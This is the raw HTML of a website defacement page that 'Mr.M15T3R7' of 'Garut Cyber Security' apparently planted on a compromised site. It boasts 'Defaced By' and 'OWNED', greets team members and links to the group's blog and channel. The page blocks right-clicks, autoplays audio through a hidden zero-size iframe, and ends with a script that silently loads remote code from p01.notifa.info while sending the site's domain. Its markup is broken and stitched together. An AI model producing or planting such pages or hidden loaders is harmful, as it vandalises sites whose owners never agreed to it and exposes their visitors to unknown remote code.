<!DOCTYPE html>
<script>
 alert("WELCOM ADMIN");
 </script>
<link rel="icon" type="image/png" href="https://scontent.fcgk4-1.fna.fbcdn.net/v/t1.0-9/48409446_695269020874013_6931095167176802304_n.jpg?_nc_cat=100&_nc_eui2=AeF-SYYmI2ssoo2jugeqX6YRd_REuADQSnjTCKfLCp3KavWeR25emYv4I5OCUS0_ATJLyKPadXJFZJDrlM_9BG4Gl7kLoCLD_MnfVuC59jCOvw&_nc_oc=AQkieWUpX7YT3hPwwxNJmullllQyfgAmxS8rBweGMHHQm-kCxIobSGY9HAutKNhDrIM&_nc_ht=scontent.fcgk4-1.fna&oh=11a15701e1feaae9202e63561ecb3f0c&oe=5DF35C85">
 <html>
<head>
<meta name="description" content="[ Garut Cyber Security ]"/>
<meta name="keywords" content="Sorry Admin , Your Security Tested By Mr.M15T3R7"/>
<meta property="og:title" content=" hacked by Mr.M15T3R7"/>
<meta property="og:image" content="<a href="img src="https://scontent.fcgk4-1.fna.fbcdn.net/v/t1.0-9/48409446_695269020874013_6931095167176802304_n.jpg?_nc_cat=100&_nc_eui2=AeF-SYYmI2ssoo2jugeqX6YRd_REuADQSnjTCKfLCp3KavWeR25emYv4I5OCUS0_ATJLyKPadXJFZJDrlM_9BG4Gl7kLoCLD_MnfVuC59jCOvw&_nc_oc=AQkieWUpX7YT3hPwwxNJmullllQyfgAmxS8rBweGMHHQm-kCxIobSGY9HAutKNhDrIM&_nc_ht=scontent.fcgk4-1.fna&oh=11a15701e1feaae9202e63561ecb3f0c&oe=5DF35C85">
<meta property="og:image:width " content="800">
<meta property="og:image:height" content="500">
	<title>Hcked By Mr.M15T3R7</title>
	<link href="https://fonts.googleapis.com/css?family=Amatic+SC:400,700" rel="stylesheet">
	<meta name="author" content="hello guys">
	<meta charset="utf-8">
	<link href="https://fonts.googleapis.com/css?family=Jolly+Lodger" rel="stylesheet">
	<link href="https://fonts.googleapis.com/css?family=Indie+Flower" rel="stylesheet">
	<link href="https://fonts.googleapis.com/css?family=Iceland" rel="stylesheet"> 
	<link href="https://fonts.googleapis.com/css?family=Arvo" rel="stylesheet">
	<style type="text/css">
	@import url('https://fonts.googleapis.com/css?family=Jolly+Lodger');
	@import url('https://fonts.googleapis.com/css?family=Indie+Flower');
	@import url('https://fonts.googleapis.com/css?family=Iceland');
	@import url('https://fonts.googleapis.com/css?family=Arvo');
	body{
		background-image: url("http://no.wallpaperforgirls.com/mobile/hender/bakgrunnsbilde-for-jenter-1152x864-734-e4fb7e9e.jpg");
		background-color: ();
		background-repeat: no-repeat;
		background-attachment: fixed;
		background-size: 100% 100%;
	}
	.glitchtext {
		justify-content: center;
		align-items: center;
		display: flex;
	}
	.text {
		font-family: "Jolly Lodger";
		font-size: 19.5px;
		color: #000000;
		text-shadow: 0 0 12.5px #0087FF;
		margin: 4%;
		margin-top: 2%;
	}
	.dud {
		color: black;
	}
	.matrix {color: lime; font-family: "Jolly Lodger";  font-size:15pt; text-align:center; width:10px; padding:0px; margin:0px;}

	h1 {
		color: red;
		font-family: "Jolly Lodger";
		font-size: 60px;
		font-weight: 400;
		text-align: center;
		margin: 0;
		line-height: 0;
		animation: glitch1 2.5s infinite;
	}
	h1:nth-child(2) {
		color: blue;
		animation: glitch2 2.5s infinite;
	}
	h1:nth-child(3) {
		color: white;
		animation: glitch3 2.5s infinite;
	}
	@keyframes glitch1 {
		0% {
			transform: none;
			opacity: 1;
		}
		7% {
			transform: skew(-0.5deg, -0.9deg);
			opacity: 0.75;
		}
		10% {
			transform: none;
			opacity: 1;
		}
		27% {
			transform: none;
			opacity: 1;
		}
		30% {
			transform: skew(0.8deg, -0.1deg);
			opacity: 0.75;
		}
		35% {
			transform: none;
			opacity: 1;
		}
		52% {
			transform: none;
			opacity: 1;
		}
		55% {
			transform: skew(-1deg, 0.2deg);
			opacity: 0.75;
		}
		50% {
			transform: none;
			opacity: 1;
		}
		72% {
			transform: none;
			opacity: 1;
		}
		75% {
			transform: skew(0.4deg, 1deg);
			opacity: 0.75;
		}
		80% {
			transform: none;
			opacity: 1;
		}
		100% {
			transform: none;
			opacity: 1;
		}
	}

	@keyframes glitch2 {
		0% {
			transform: none;
			opacity: 0.25;
		}
		7% {
			transform: translate(-2px, -3px);
			opacity: 0.5;
		}
		10% {
			transform: none;
			opacity: 0.25;
		}
		27% {
			transform: none;
			opacity: 0.25;
		}
		30% {
			transform: translate(-5px, -2px);
			opacity: 0.5;
		}
		35% {
			transform: none;
			opacity: 0.25;
		}
		52% {
			transform: none;
			opacity: 0.25;
		}
		55% {
			transform: translate(-5px, -1px);
			opacity: 0.5;
		}
		50% {
			transform: none;
			opacity: 0.25;
		}
		72% {
			transform: none;
			opacity: 0.25;
		}
		75% {
			transform: translate(-2px, -6px);
			opacity: 0.5;
		}
		80% {
			transform: none;
			opacity: 0.25;
		}
		100% {
			transform: none;
			opacity: 0.25;
		}
	}

	@keyframes glitch3 {
		0% {
			transform: none;
			opacity: 0.25;
		}
		7% {
			transform: translate(2px, 3px);
			opacity: 0.5;
		}
		10% {
			transform: none;
			opacity: 0.25;
		}
		27% {
			transform: none;
			opacity: 0.25;
		}
		30% {
			transform: translate(5px, 2px);
			opacity: 0.5;
		}
		35% {
			transform: none;
			opacity: 0.25;
		}
		52% {
			transform: none;
			opacity: 0.25;
		}
		55% {
			transform: translate(5px, 1px);
			opacity: 0.5;
		}
		50% {
			transform: none;
			opacity: 0.25;
		}
		72% {
			transform: none;
			opacity: 0.25;
		}
		75% {
			transform: translate(2px, 6px);
			opacity: 0.5;
		}
		80% {
			transform: none;
			opacity: 0.25;
		}
		100% {
			transform: none;
			opacity: 0.25;
		}
	}
</style>
</head>
<script language="JavaScript">
 function tb5_makeArray(n){
 this.length = n;
 return this.length;
}
 
tb5_messages = new tb5_makeArray(3);
tb5_messages[0] = "HcKd By Mr.M15T3R7"; 
tb5_messages[1] = " gue cwo gans "; 
tb5_messages[2] = "Garut Cyber Security"; // 
tb5_rptType = 'infinite';
tb5_rptNbr = 20;
tb5_speed = 40;
tb5_delay = 2000;
var tb5_counter=2;
var tb5_currMsg=0;
var tb5_stsmsg="";
function tb5_shuffle(arr){
var k;
for (i=0; i<arr.length; i++){
 k = Math.round(Math.random() * (arr.length - i - 1)) + i;
 temp = arr[i];arr[i]=arr[k];arr[k]=temp;
}
return arr;
}
tb5_arr = new tb5_makeArray(tb5_messages[tb5_currMsg].length);
tb5_sts = new tb5_makeArray(tb5_messages[tb5_currMsg].length);
for (var i=0; i<tb5_messages[tb5_currMsg].length; i++){
 tb5_arr[i] = i;
 tb5_sts[i] = "_";
}
tb5_arr = tb5_shuffle(tb5_arr);
function tb5_init(n){
var k;
if (n == tb5_arr.length){
 if (tb5_currMsg == tb5_messages.length-1){
 if ((tb5_rptType == 'finite') && (tb5_counter==tb5_rptNbr)){
 clearTimeout(tb5_timerID);
 return;
 }
 tb5_counter++;
 tb5_currMsg=0;
 }
 else{
 tb5_currMsg++;
 }
 n=0;
 tb5_arr = new tb5_makeArray(tb5_messages[tb5_currMsg].length);
 tb5_sts = new tb5_makeArray(tb5_messages[tb5_currMsg].length);
 for (var i=0; i<tb5_messages[tb5_currMsg].length; i++){
 tb5_arr[i] = i;
 tb5_sts[i] = "_";
 }
 tb5_arr = tb5_shuffle(tb5_arr);
 tb5_sp=tb5_delay;
}
else{
 tb5_sp=tb5_speed;
 k = tb5_arr[n];
 tb5_sts[k] = tb5_messages[tb5_currMsg].charAt(k);
 tb5_stsmsg = "";
 for (var i=0; i<tb5_sts.length; i++)
 tb5_stsmsg += tb5_sts[i];
 document.title = tb5_stsmsg;
 n++;
 }
 tb5_timerID = setTimeout("tb5_init("+n+")", tb5_sp);
}
function tb5_randomizetitle(){
 tb5_init(0);
}
tb5_randomizetitle();

var message="COPAS??? JANGAN BEGO!!";

function clickIE4(){
if (event.button==2){
alert(message);
return false;
}
}
function clickNS4(e){
if (document.layers||document.getElementById&&!document.all){
if (e.which==2||e.which==3){
alert(message);
return false;
}
}
}
if (document.layers){
document.captureEvents(Event.MOUSEDOWN);
document.onmousedown=clickNS4;
}
else if (document.all&&!document.getElementById){
document.onmousedown=clickIE4;
}
document.oncontextmenu=new Function("alert(message);return false")
// -->
</script>
<script type="text/javascript" language="javascript">
 
 
 
<!--
 
var rows=1; // must be an odd number
 
var speed=20; // lower is faster
 
var reveal=5; // between 0 and 2 only. The higher, the faster the word appears
 
var effectalign="center" //enter "center" to center it.
 
 
 
/***********************************************
 
* 
 
***********************************************/
 
 
 
 
var w3c=document.getElementById && !window.opera;;
 
var ie45=document.all && !window.opera;
 
var ma_tab, matemp, ma_bod, ma_row, x, y, columns, ma_txt, ma_cho;
 
var m_coch=new Array();
 
var m_copo=new Array();
 
window.onload=function() {
 
    if (!w3c && !ie45) return
 
 var matrix=(w3c)?document.getElementById("matrix"):document.all["matrix"];
 
 ma_txt=(w3c)?matrix.firstChild.nodeValue:matrix.innerHTML;
 
 ma_txt=" "+ma_txt+" ";
 
 columns=ma_txt.length;
 
 if (w3c) {
 
   while (matrix.childNodes.length) matrix.removeChild(matrix.childNodes[0]);
 
   ma_tab=document.createElement("table");
 
   ma_tab.setAttribute("border", 0);
 
   ma_tab.setAttribute("align", effectalign);
 
   ma_tab.style.backgroundColor="#000000";
 
   ma_bod=document.createElement("tbody");
 
   for (x=0; x<rows; x++) {
 
     ma_row=document.createElement("tr");
 
     for (y=0; y<columns; y++) {
 
       matemp=document.createElement("td");
 
       matemp.setAttribute("id", "Mx"+x+"y"+y);
 
       matemp.className="matrix";
 
       matemp.appendChild(document.createTextNode(String.fromCharCode(160)));
 
       ma_row.appendChild(matemp);
 
     }
 
     ma_bod.appendChild(ma_row);
 
   }
 
   ma_tab.appendChild(ma_bod);
 
   matrix.appendChild(ma_tab);
 
 } else {
 
   ma_tab='<ta'+'ble align="'+effectalign+'" border="0" style="background-color:#000000">';
 
   for (var x=0; x<rows; x++) {
 
     ma_tab+='<t'+'r>';
 
     for (var y=0; y<columns; y++) {
 
       ma_tab+='<t'+'d class="matrix" id="Mx'+x+'y'+y+'"> </'+'td>';
 
     }
 
     ma_tab+='</'+'tr>';
 
   }
 
   ma_tab+='</'+'table>';
 
   matrix.innerHTML=ma_tab;
 
 }
 
 ma_cho=ma_txt;
 
 for (x=0; x<columns; x++) {
 
   ma_cho+=String.fromCharCode(32+Math.floor(Math.random()*94));
 
   m_copo[x]=0;
 
 }
 
 ma_bod=setInterval("mytricks()", speed);
 
}
 
 
 
function mytricks() {
 
 x=0;
 
 for (y=0; y<columns; y++) {
 
   x=x+(m_copo[y]==100);
 
   ma_row=m_copo[y]%100;
 
   if (ma_row && m_copo[y]<100) {
 
     if (ma_row<rows+1) {
 
       if (w3c) {
 
         matemp=document.getElementById("Mx"+(ma_row-1)+"y"+y);
 
         matemp.firstChild.nodeValue=m_coch[y];
 
       }
 
       else {
 
         matemp=document.all["Mx"+(ma_row-1)+"y"+y];
 
         matemp.innerHTML=m_coch[y];
 
       }
 
       matemp.style.color="#81F2FF";
 
       matemp.style.fontWeight="bold";
 
     }
 
     if (ma_row>1 && ma_row<rows+2) {
 
       matemp=(w3c)?document.getElementById("Mx"+(ma_row-2)+"y"+y):document.all["Mx"+(ma_row-2)+"y"+y];
 
       matemp.style.fontWeight="normal";
 
       matemp.style.color="#00BBFF";
 
     }
 
     if (ma_row>2) {
 
         matemp=(w3c)?document.getElementById("Mx"+(ma_row-3)+"y"+y):document.all["Mx"+(ma_row-3)+"y"+y];
 
       matemp.style.color="#20FFDA";
 
     }
 
     if (ma_row<Math.floor(rows/2)+1) m_copo[y]++;
 
     else if (ma_row==Math.floor(rows/2)+1 && m_coch[y]==ma_txt.charAt(y)) zoomer(y);
 
     else if (ma_row<rows+2) m_copo[y]++;
 
     else if (m_copo[y]<100) m_copo[y]=0;
 
   }
 
   else if (Math.random()>0.9 && m_copo[y]<100) {
 
     m_coch[y]=ma_cho.charAt(Math.floor(Math.random()*ma_cho.length));
 
     m_copo[y]++;
 
   }
 
 }
 
 if (x==columns) clearInterval(ma_bod);
 
}
 
 
 
function zoomer(ycol) {
 
 var mtmp, mtem, ytmp;
 
 if (m_copo[ycol]==Math.floor(rows/2)+1) {
 
   for (ytmp=0; ytmp<rows; ytmp++) {
 
     if (w3c) {
 
       mtmp=document.getElementById("Mx"+ytmp+"y"+ycol);
 
       mtmp.firstChild.nodeValue=m_coch[ycol];
 
     }
 
     else {
 
       mtmp=document.all["Mx"+ytmp+"y"+ycol];
 
       mtmp.innerHTML=m_coch[ycol];
 
     }
 
     mtmp.style.color="#5BEEFF";
 
     mtmp.style.fontWeight="bold";
 
   }
 
   if (Math.random()<reveal) {
 
     mtmp=ma_cho.indexOf(ma_txt.charAt(ycol));
 
     ma_cho=ma_cho.substring(0, mtmp)+ma_cho.substring(mtmp+1, ma_cho.length);
 
   }
 
   if (Math.random()<reveal-1) ma_cho=ma_cho.substring(0, ma_cho.length-1);
 
   m_copo[ycol]+=199;
 
   setTimeout("zoomer("+ycol+")", speed);
 
 }
 
 else if (m_copo[ycol]>200) {
 
   if (w3c) {
 
     mtmp=document.getElementById("Mx"+(m_copo[ycol]-201)+"y"+ycol);
 
     mtem=document.getElementById("Mx"+(200+rows-m_copo[ycol]--)+"y"+ycol);
 
   }
 
   else {
 
     mtmp=document.all["Mx"+(m_copo[ycol]-201)+"y"+ycol];
 
     mtem=document.all["Mx"+(200+rows-m_copo[ycol]--)+"y"+ycol];
 
   }
 
   mtmp.style.fontWeight="normal";
 
   mtem.style.fontWeight="normal";
 
   setTimeout("zoomer("+ycol+")", speed);
 
 }
 
 else if (m_copo[ycol]==200) m_copo[ycol]=100+Math.floor(rows/2);
 
 if (m_copo[ycol]>100 && m_copo[ycol]<200) {
 
   if (w3c) {
 
     mtmp=document.getElementById("Mx"+(m_copo[ycol]-101)+"y"+ycol);
 
     mtmp.firstChild.nodeValue=String.fromCharCode(160);
 
     mtem=document.getElementById("Mx"+(100+rows-m_copo[ycol]--)+"y"+ycol);
 
     mtem.firstChild.nodeValue=String.fromCharCode(160);
 
   }
 
   else {
 
     mtmp=document.all["Mx"+(m_copo[ycol]-101)+"y"+ycol];
 
     mtmp.innerHTML=String.fromCharCode(160);
 
     mtem=document.all["Mx"+(100+rows-m_copo[ycol]--)+"y"+ycol];
 
     mtem.innerHTML=String.fromCharCode(160);
 
   }
 
   setTimeout("zoomer("+ycol+")", speed);
 
 }
 
 
 
 //start
 
var h1 = document.getElementsByTagName("h1")[0],
 
text = h1.innerText || h1.textContent,
 
split = [], i, lit = 0, timer = null;
 
for(i = 0; i < text.length; ++i) {
 
split.push("<span>" + text[i] + "</span>");
 
}
 
h1.innerHTML = split.join("");
 
split = h1.childNodes;
 
 
 
var flicker = function() {
 
lit += 0.01;
 
if(lit >= 1) {
 
clearInterval(timer);
 
}
 
for(i = 0; i < split.length; ++i) {
 
if(Math.random() < lit) {
 
split[i].className = "neon";
 
} else {
 
split[i].className = "";
 
}
 
}
 
}
 
setInterval(flicker, 100);
 
 
 
}
 

 
</script>
<body>
	<div id="matrix" class="auto-style8">Defaced By Mr.M15T3R7</div><br>
		<br><br>
		<div id="glitchtext">
			<h1>___-Garut Cyber Security-___</h1>
			<h1>___-Garut Cyber Security-___</h1>
			<h1>___-Garut Cyber Security-___</h1>
        <br><br>
		 <style type="text/css">body { font-family: 'times'; color: white; padding: 0; margin: 0; background-image: url(''); background-repeat:no-repeat; background-position:center; background-size: 100% 100%; } { 0% { opacity: 1.0; } 50% { opacity: 0.0; } 100% { opacity: 1.0; } } img { opacity: 0.8; } img { animation-name: rotate ; animation-duration: 5s; animation-play-state: running; animation-timing-function: linear; animation-iteration-count: infinite; opacity: 1.0; filter: alpha(opacity=50); } img:hover { opacity: 1.0;filter: alpha(opacity=100); } @keyframes rotate{ 10% {transform:rotateY(36deg)} 20% {transform:rotateY(72deg)} 30% {transform:rotateY(108deg)} 40% {transform:rotateY(144deg)} 50% {transform:rotateY(180deg)} 60% {transform:rotateY(216deg)} 70% {transform:rotateY(252deg)} 80% {transform:rotateY(288deg)} 90% {transform:rotateY(324deg)} 100% {transform:rotateY(360deg)} } </style><b> <center> <img src="https://scontent.fcgk4-1.fna.fbcdn.net/v/t1.0-9/70005900_735728013546814_544610026455564288_n.jpg?_nc_cat=100&_nc_eui2=AeF1uFXxyfZwGxVaPU_21QnfEhQWPujcnl0Tam8wmcg5r60z2NuK7rEDiZ_vLHUl3bUdWmpFoF35zwOg6KMTsXGI5QM68INT_f3XhLd1VVOHsQ&_nc_oc=AQmDH1b5pHv-Jlk1XWm5mOyBb0kzBhAROwjf1TCIIdqQO4ov4JAUGqbbWGdWaiGX4dQ&_nc_ht=scontent.fcgk4-1.fna&oh=936bc3ae8b0c34b269e1fc97fec24789&oe=5E3C3AD7" width="300" height="300"> <body style="color: white; background-color:black;">
		<br>
			<font color="red">
			<h1>___!! I AM HERE INYOUR SITE !!___</h1>
			<h1>___!! I AM HERE INYOUR SITE !!___</h1>
			<h1>___!! I AM HERE INYOUR SITE !!___</h1>
		</div><br><br><center>
		<font color="red" size="6" face="Iceland">-=[<font color="aqua" size="6" face="Indie Flower">Defaced By Mr.M15T3R7<font color="red" size="6" face="Iceland">]=-</font><br>
	<br>
		<center><b><font color="red" size="6" face="Indie Flower">THANKS FOR</font>

MY TEAM  GARUT<font color="red" size="6" face="Indie Flower"> CYBER SECURITY</font> <font color="cyan">:<font color="white">:</b></p> </font> <font face="Play" class="cn"><font face="Indie Flower"> -= 

Mr.K0M4M1 <font color="red">|</font> InYour-S3rv3r <font color="red">|</font> MR.ELIXSIOR <font color="red">|</font> Mister_D <font 

color="red">|</font> N3WBI3_T3RS4K1T1 <font color="red">|</font> H4ndr1k <font color="red">|</font> H45B1 <font color="cyan">=-</font><br></font>
<font color="red" size="6" face="Indie Flower">
 VISIT BLOG MY TEAM  : <font color="white" size="6" face="Indie Flower">KLIK SINI <a href="https://garutcybersecuritylite.blogspot.com/"> OM </a> <br>
 VISIY MY CHANEL<font color="red" size="6" face="Indie Flower"> YOUTUBE :<font color="white" size="6" face="Indie Flower"> KLIK DISINI <a href="https://www.youtube.com/channel/UCZYNVspqU_nKwLazvI0ZQgw"> TANTE </a>
</font> 
		<br>

		<center><H3>
			<font size="7" face="Iceland">
<SCRIPT>

farbbibliothek = new Array(); 
farbbibliothek[0] = new Array("#FF0000","#FF1100","#FF2200","#FF3300","#FF4400","#FF5500","#FF6600","#FF7700","#FF8800","#FF9900","#FFaa00","#FFbb00","#FFcc00","#FFdd00","#FFee00","#FFff00","#FFee00","#FFdd00","#FFcc00","#FFbb00","#FFaa00","#FF9900","#FF8800","#FF7700","#FF6600","#FF5500","#FF4400","#FF3300","#FF2200","#FF1100"); 
farbbibliothek[1] = new Array("#FF0000","#FFFFFF","#FFFFFF","#FF0000"); 
farbbibliothek[2] = new Array("#FFFFFF","#FF0000","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF","#FFFFFF"); 
farbbibliothek[3] = new Array("#FF0000","#FF4000","#FF8000","#FFC000","#FFFF00","#C0FF00","#80FF00","#40FF00","#00FF00","#00FF40","#00FF80","#00FFC0","#00FFFF","#00C0FF","#0080FF","#0040FF","#0000FF","#4000FF","#8000FF","#C000FF","#FF00FF","#FF00C0","#FF0080","#FF0040"); 
farbbibliothek[4] = new Array("#FF0000","#EE0000","#DD0000","#CC0000","#BB0000","#AA0000","#990000","#880000","#770000","#660000","#550000","#440000","#330000","#220000","#110000","#000000","#110000","#220000","#330000","#440000","#550000","#660000","#770000","#880000","#990000","#AA0000","#BB0000","#CC0000","#DD0000","#EE0000"); 
farbbibliothek[5] = new Array("#FF0000","#FF0000","#FF0000","#FFFFFF","#FFFFFF","#FFFFFF"); 
farbbibliothek[6] = new Array("#FF0000","#FDF5E6"); 
farben = farbbibliothek[4];
function farbschrift() 
{ 
for(var i=0 ; i<Buchstabe.length; i++) 
{ 
document.all["a"+i].style.color=farben[i]; 
} 
farbverlauf(); 
} 
function string2array(text) 
{ 
Buchstabe = new Array(); 
while(farben.length<text.length) 
{ 
farben = farben.concat(farben); 
} 
k=0; 
while(k<=text.length) 
{ 
Buchstabe[k] = text.charAt(k); 
k++; 
} 
} 
function divserzeugen() 
{ 
for(var i=0 ; i<Buchstabe.length; i++) 
{ 
document.write("<span id='a"+i+"' class='a"+i+"'>"+Buchstabe[i] + "</span>"); 
} 
farbschrift(); 
} 
var a=1; 
function farbverlauf() 
{ 
for(var i=0 ; i<farben.length; i++) 
{ 
farben[i-1]=farben[i]; 
} 
farben[farben.length-1]=farben[-1]; 
setTimeout("farbschrift()",30); 
} 
// 
var farbsatz=1; 
function farbtauscher() 
{ 
farben = farbbibliothek[farbsatz]; 
while(farben.length<text.length) 
{ 
farben = farben.concat(farben); 
} 
farbsatz=Math.floor(Math.random()*(farbbibliothek.length-0.0001)); 
} 
setInterval("farbtauscher()",10000); 
text =" WE BIG FAMILY GARUT CYBER SECURITY ";
string2array(text);
divserzeugen(); 
</SCRIPT><br>
		<font color="white" size="6" face="Jolly Lodger">&copy Garut Cyber Security</font></center>
<iframe width="0%" height="0" scrolling="no" frameborder="no" src="https://api.soundcloud.com/tracks/147665621/stream?client_id=a3e059563d7fd3372b49b37f00a00bcf;color=ff5500&amp;auto_play=true&amp;hide_related=false&amp;show_comments=true&amp;show_user=true&amp;show_reposts=false"></iframe>
<style> .error { text-align: center; font-family: 'Gilda Display', serif; -webkit-animation: noise-3 1s linear infinite; animation: noise-3 1s linear infinite; overflow: default; } .info { text-align: center; width: 200px; height: 60px; margin: auto; position: absolute; top: 280px; bottom: 0; left: 20px; right: 0; -webkit-animation: noise-3 1s linear infinite; animation: noise-3 1s linear infinite; } .info:after { content: 'OWNED'; font-family: OCR-A; font-size: 100px; text-align: center; width: 800px; margin: auto; position: absolute; top: 20px; bottom: 0; left: 40px; right: 0; opacity: 0; color: white; -webkit-animation: noise-1 .2s linear infinite; animation: noise-1 .2s linear infinite; } @-webkit-keyframes noise-1 { 0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;} 10% {opacity: .1;} 50% {opacity: .5; left: -6px;} 80% {opacity: .3;} 100% {opacity: .6; left: 2px;} } @keyframes noise-1 { 0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;} 10% {opacity: .1;} 50% {opacity: .5; left: -6px;} 80% {opacity: .3;} 100% {opacity: .6; left: 2px;} } @-webkit-keyframes noise-2 { 0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;} 10% {opacity: .1;} 50% {opacity: .5; left: 6px;} 80% {opacity: .3;} 100% {opacity: .6; left: -2px;} } @keyframes noise-2 { 0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;} 10% {opacity: .1;} 50% {opacity: .5; left: 6px;} 80% {opacity: .3;} 100% {opacity: .6; left: -2px;} } @-webkit-keyframes noise { 0%, 3%, 5%, 42%, 44%, 100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);} 4.3% {opacity: 1; -webkit-transform: scaleY(1.7); transform: scaleY(1.7);} 43% {opacity: 1; -webkit-transform: scaleX(1.5); transform: scaleX(1.5);} } @keyframes noise { 0%, 3%, 5%, 42%, 44%, 100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);} 4.3% {opacity: 1; -webkit-transform: scaleY(1.7); transform: scaleY(1.7);} 43% {opacity: 1; -webkit-transform: scaleX(1.5); transform: scaleX(1.5);} } @-webkit-keyframes noise-3 { 0%,3%,5%,42%,44%,100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);} 4.3% {opacity: 1; -webkit-transform: scaleY(4); transform: scaleY(4);} 43% {opacity: 1; -webkit-transform: scaleX(10) rotate(60deg); transform: scaleX(10) rotate (60deg);} } @keyframes noise-3 { 0%,3%,5%,42%,44%,100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);} 4.3% {opacity: 1; -webkit-transform: scaleY(4); transform: scaleY(4);} 43% {opacity: 1; -webkit-transform: scaleX(10) rotate(60deg); transform: scaleX(10) rotate (60deg);} } .wrap { top: 30%; left: 25%; height: 200px; margin-top: -100px; position: absolute; } code { color: white; } span.blue { color: #48beef; } span.comment { color: #7f8c8d; } span.orange { color: #f39c12; } span.green { color: #33cc33; } .viewFull { font-family:OCR-A; color:orange; text-decoration:; } } @media only screen and (min-height: 500px) { .viewFull{ display:none; } } </style> <center> <style> img { filter:alpha(opacity=70); -moz-opacity:0.7; opacity:0.7; } img:hover { filter:alpha(opacity=100); -moz-opacity:.0; opacity:1.0; } </style> <body bgcolor='black'/><center><b> <style type="text/css"> <!-- .style2 {font-size: small} .style4 {color: #FF0000; font-weight: bold; } .style5 {color: #FFFFFF} .style8 {color: #FFFFFF; font-weight: bold; } .style10 {color: #FF0000} --> </style> <body bgcolor="black"> <div align="center"> </span></font></b><font color="white"> <style> body { background: #000; font-family: "Audiowide", Verdana, sans-serif; } h1 { color: #333; font-size: 40px; margin: 1px auto; text-align:center; text-transform:uppercase; } .neon { color: #FFFFFF; text-shadow: 0 0 5px #ff0000, 0 0 10px #ff0000, 0 0 20px #ff0000, 0 0 45px #ff0000, 0 0 40px #ff0000; } </style> <script language="JavaScript1.2"> function ClearError() {return true;} window.onerror = ClearError; </script> </style>&nbsp;<script> window.onload = function() { var h1 = document.getElementsByTagName("h1")[0], text = h1.innerText || h1.textContent, split = [], i, lit = 0, timer = null; for(i = 0; i < text.length; ++i) { split.push("<span>" + text[i] + "</span>"); } h1.innerHTML = split.join(""); split = h1.childNodes; var flicker = function() { lit += 0.01; if(lit >= 1) { clearInterval(timer); } for(i = 0; i < split.length; ++i) { if(Math.random() < lit) { split[i].className = "neon"; } else { split[i].className = ""; } } } setInterval(flicker, 100); } </script> <style> body { background	: black; background-image: url(https:// ); background-repeat:no-repeat; background-attachment: fixed; background-size: 1350px; font-family	: Times New Roman, Times, serif; text-align	: center; color		: #fff; } </script> <center> </style> <center> <script> </script> <center><style> @keyframes blink{ 0%{color:black} 50%{color:white} 100%{color:black} } @-webkit-keyframes blink{ 0%{color:black} 50%{color:white} 100%{color:black} } .blink{ -webkit-animation:blink 6s linear infinite;-moz -animation:blink 5s linear infinite;animation:blink 1s linear infinite } </style>
<div class="error">
</footer>
</footer>
	<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582NzYpoUazw5m5bYnu6tGARiUvU5X6I16YJnA%2b5EJ4gU7oT4NyAns1HDJb8iRGFJ6U2KKyz6DiyvqgWC3idl1eAEYqBjMlQH0Cj7Ld2OHZ3%2fV0yIXOwHOYMjEpqxueQX%2bC%2bVauF%2bOCnYyfDX%2fmgV6ih1aV7zTOot5KA%2fajEwMwEhdh7PsOI2f62auA%2fr5wGaw0wuTCEnp8Bvhq%2bgGSiMEQ7Inbj8O0tIEEJk6kiOg9zkPyw9oczaiKi82eDjgxYvuafkukcWbk0MupZBGSyOSTy3fuBDxbnRUSOhvD9hMa4ckwnZgryIX7JnrixNJtC5urJCH%2fG2pgiNo5fO3iPiepgQON%2bmFoinpqRr3UcfUHOAseJihjT3M6Sc5S16xRkzocBoje4yPWN1xDwf8%2ftAf0YKcrbibRExLLcWdesv3LlrvsJ3e3NwTVM7IfMHMLrVgz%2fWFX4BOXMuqL8MgwIcBY2A6oa4iNX7w1UX5KaqPCDKxiEGnyoeoHcHp4%2f78Hwz8DIq5rUAIogC75ZxO%2bHxPgRtwYVkR65PZ0exDWU5ijBfYuF4OmcKWkpc%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
	</html>
